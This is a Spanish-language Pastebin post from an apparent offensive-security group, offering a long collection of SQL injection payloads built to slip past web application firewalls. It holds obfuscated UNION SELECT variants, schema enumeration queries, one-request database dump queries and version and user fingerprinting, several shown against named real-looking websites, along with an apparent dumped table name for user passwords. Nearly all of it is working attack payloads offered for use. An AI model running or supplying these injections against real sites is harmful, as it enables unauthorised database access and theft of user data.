Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _____ ____ _ _____ _ _ _ ______ _____ _______ _____ ____ _ _
- / ____|/ __ \| | |_ _| \ | | | | ____/ ____|__ __|_ _/ __ \| \ | |
- | (___ | | | | | | | | \| | | | |__ | | | | | || | | | \| |
- \___ \| | | | | | | | . ` |_ | | __|| | | | | || | | | . ` |
- ____) | |__| | |____ _| |_| |\ | |__| | |___| |____ | | _| || |__| | |\ |
- |_____/ \___\_\______| |_____|_|_\_|\____/|______\_____| |_| |_____\____/|_| \_|
- \ \ / /\ | ____| | _ \
- \ \ /\ / / \ | |__ | |_) |_ _ _ __ __ _ ___ ___
- \ \/ \/ / /\ \ | __| | _ <| | | | '_ \ / _` / __/ __|
- \ /\ / ____ \| | | |_) | |_| | |_) | (_| \__ \__ \
- \/ \/_/ \_\_| |____/ \__, | .__/ \__,_|___/___/
- __/ | |
- |___/|_| [RedBird Offensive Security]
- Métodos de evasión WAF para inyecciones sql
- Quiero compartir los métodos de evasión WAF para inyecciones sql. La mayoría son viejos pero pocos son más nuevos. Puede omitir la mayoría de los errores "404 prohibido" y "NO aceptable" mediante estos métodos.
- -------------------------------------------------------------------------------------------------------------------------------
- 1) id=1+UnIoN+SeLecT 1,2,3 --+
- 2) id=1+UnIOn/**/SeLect 1,2,3 --+
- 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
- 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
- 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
- 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
- 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
- 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
- /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- div + 0
- Having +1 = 0
- AND+ 1 = 0
- /*!and*/ +1 = 0
- and( 1 )=(0 ) x
- OR false the url query
- id =- 1 union all select
- id =null union all select
- id =1 +and+ false + union +all +select
- id = 9999 union all select
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//
- http : //www.xxx.com/project.php?cat=Conservation'
- +and(1)=(0) +union+distinct+select+ 1
- and use: and 1=0 to apear column number in the page
- or
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- Hard WAF bypass tips
- Whitespaces :
- union(select(0),version(),(0),(0),(0),(0),(0),(0),
- (0))
- %0Aunion%0Aselect%0A1,2,3--
- /**/union/**/select/**/1,2,3--
- like ::
- PHP Code:
- http ://www.xxx.com/
- list_itinerary.php?id=-4%20union
- %20%28select%201,2,version
- %28%29,4,5,6,7,8%29%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- NICE QUERY
- www.xxx.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
- www.xxx.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Bypassing ::
- (Double Keyword): UNIunionON+SELselectECT
- +union+distinct+select+
- +union+distinctROW+select+
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni<on all sel<ect
- %20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /*!20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f
- %252a*/
- +%23sexsexsex%0AUnIOn%23sexsexsex
- %0ASeLecT+
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- like ::
- PHP Code:
- http ://www.xxx.com/
- list_itinerary.php?id=-4%20union
- %23aa%0Aselect%201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.xxx.com/
- list_itinerary.php?id=-4%20/**/
- union/*!50000select*/
- %201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.xxx.com/
- list_itinerary.php?id=-4%20/*!
- 20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/%201,2,version
- %28%29,4,5,6,7,8%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- after id no. like id=1 +/*!and*/+1=0
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- false the url query :
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- id= - 1 union all select
- id= null union all select
- id=1 +and+false+ union+all+select
- id= 9999 union all select
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Order Bypassing do like this
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- /*!table_name*/
- +from /*!information_schema*/./*!tables*/ where
- table_schema=database()
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- unhex(hex(Concat
- (Column_Name,0x3e,Table_schema,0x3e,table_
- Name)))
- /*!from*/information_schema.columns/*!where*/
- column_name%20/*!like*/char(37,%20112,%2097,
- %20115,%20115,%2037)
- like ::
- PHP Code:
- http ://www.westbury.com/
- article.php?
- article_id=-117%20union%20select
- %201,2,unhex%28hex%28Concat
- %28Column_Name,0x3e,Table_
- schema, 0x3e,table_Name
- %29%29%29,4,5,6,7/*!from*/
- information_schema.columns/*!
- where*/column_name%20/*!like*/
- char%2837,%20112,%2097,%20115,
- %20115,%2037%29--
- user_passwd>westbur6_website>user_info
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- used with order ::
- convert( using ascii) or unhex(hex())
- like :
- PHP Code:
- www. westbury. com/ article. php?
- article_id =- 117 union select 1 , 2 ,
- convert ( group_concat
- (table_name ) using ascii ), 4 , 5 ,6 , 7 +
- from +information_schema .tables --
- IF'ascii' dosent work? you can try
- PHP Code:
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2132
- armscii8
- ascii
- binary
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- ------------------------------Best Bypass WAF------------------------------------
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- Group_Concat
- group_concat ()
- /*!group_concat*/ ()
- grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
- group_concat (, 0x3c62723e )
- g % 72oup_c % 6Fncat % 28 % 76% 65rsion
- % 28 %29 ,% 22 ~ BlackRose% 22 %29
- CoNcAt ()
- CONCAT (DISTINCT Version ())
- concat (, 0x3a ,)
- concat %00 ()
- % 00CoNcAt ()
- /*!50000cOnCat*/ ( /*!Version()*/ )
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/ (, 0x3a ,)
- concat_ws ()
- concat (0x3a ,, 0x3c62723e )
- /*!concat_ws(0x3a,)*/
- concat_ws ( 0x3a3a3a , version()
- CONCAT_WS ( CHAR ( 32, 58, 32 ), version
- (),)
- REVERSE( tacnoc )
- binary (version ())
- uncompress (compress ( version()))
- aes_decrypt ( aes_encrypt ( version
- (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
- [~] after id no. like id=1 +/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
- utf8
- trick to appear info inside img tag
- PHP Code:
- concat( 0x223e3c62723e ,, 0x3c696d
- 67207372633d22 )
- when the column is get into html tag,but its not
- always inside img tag.
- it could be <a> or </noscript> or anything.
- like ::
- PHP Code:
- http ://fzszy.chinacourt.org/
- public/detail.php?
- id=-168' union /*!
- %53elect*/ concat
- (0x223e3c2f613e3c2f74643e,
- version
- (),0x3c6120687265663d22)--+
- [DUMP DB in 1 Request]
- PHP Code:
- ( select (@) from ( select(@:= 0x00 ),
- ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
- (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
- ( select(@) from ( select (@:= 0x00 ),
- ( select (@) from ( table ) where (@) in (@:= concat
- (@, 0x0a , column1 , 0x3a , column2 )))) a )
- [DUMP DB in 1 Request improve]
- PHP Code:
- ( select(@ x ) from (select (@x := 0x00 ),
- ( select( 0 ) from
- ( information_schema . columns) where
- ( table_schema !
- = 0x696e666f726d6174696f6e5f736368656d61 )and
- ( 0x00 ) in(@ x := concat
- (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
- like
- http : //www.marinaplast.com/page.php?
- id=-13 union select 1,2,(select
- (@x)from(select(@x:=0x00),(select
- (0)from(information_schema.colu
- mns)where(table_schema!
- =0x696e666f726d6174696f6e5f736368656d61)and
- (0x00)in(@x:=concat
- (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
- WHITESPACES BYPASS .
- %09 %0A %0B %0C %0D %A0
- get version - DB_NAME - user - HOST_NAME -
- datadir
- PHP Code:
- version()
- convert( version() using latin1 )
- unhex ( hex( version()))
- @@GLOBAL. VERSION
- ( substr
- (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
- # like #
- www. marinaplast. com/ page . php?
- id =- 13 union select 1 , 2 ,( substr
- (@@version ,1 , 1 )=5 ), 4, 5 --
- 1 it 's mean version 5 and 0 mean version 4
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- # like #
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=5
- download good version 5
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=4
- not download good version 4
- version 5
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!50095aaaa*/ no error v5
- version 4
- id=1 /*!40123 1=1*/--+- no error
- id=1 /*!40122rrrr*/ no error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!40122rrrr*/ error not v4
- ☆¸.•*☆ ☆*•.¸☆
- DB_NAME()
- @@database
- database()
- id=vv()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,DB_NAME
- (),4,5 --
- www.marinaplast.com/page.php?id=vv
- ()
- ☆¸.•*☆ ☆*•.¸☆
- @@user
- user()
- user_name()
- system_user()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,user
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,HOST_NAME
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- @@datadir
- datadir()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,datadir(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- ASPX
- and 1=0/@@version
- ' and 1 =0 /@@ version;--
- ) and 1 =@@version--
- and 1 = 0 /user ;--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement